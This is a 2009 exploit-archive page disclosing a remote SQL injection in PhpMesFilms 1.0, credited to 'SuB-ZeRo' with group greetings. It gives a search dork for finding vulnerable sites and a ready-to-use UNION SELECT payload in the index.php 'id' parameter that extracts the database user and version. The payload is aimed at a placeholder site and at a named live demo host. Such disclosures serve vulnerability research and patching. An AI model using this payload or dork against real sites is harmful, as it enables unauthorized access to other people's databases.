[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : PhpMesFilms 1.0 (index.php id) Remote SQL Injection Vulnerability
# Published : 2009-01-04
# Author : SuB-ZeRo
# Previous Title : WSN Guest 1.23 (search) Remote SQL Injection Vulnerability
# Next Title : Comersus Shopping Cart <= v6 Remote User Pass Exploit


[~] in the name of God
[~]
[~] Download script : http://www.script-masters.com/home/download.php?script=138
[~]
[~]----------------------------------------------------------
[~] Discovered By: SuB-ZeRo(from algeria)   msn: FbH@hotmail.com
[~]
[~] D-unit : SuB-ZeRo & Me!sTer & HaLokA
[~]
[~] Home: www.dz-security.net/ my exploit : www.dz-security.net/subzero
[~]
[~] N0T: We ArE MoUsLiMme WiThE GaZa 4 ever
[~] -----------------------------------------------------------
dork : powered by PhpMesFilms
Exploit:
http://www.sit.com/script/index.php?id=3+union+select+1,concat(user(),0x3a,@@version),3,4,5,6,7,8,9,10--
---------------------------------------------------------------------------------------------
L!Ve DeMo:
http://phpmesfilms.dyndns.org/demo/index.php?id=3+union+select+1,concat(user(),0x3a,@@version),3,4,5,6,7,8,9,10--
 not : in this script some times version is 4 and some times is 5 have nice day
[~]----------------------------------------------------------------------
[~] Greetz tO: Me!sTer & HaLoKa & MaXi32 & Dz-TeAm and all algeria & gaza
[~] we are D-unit www.dz-security.net
[~]----------------------------------------------------------------------

# www.Syue.com [2009-01-04]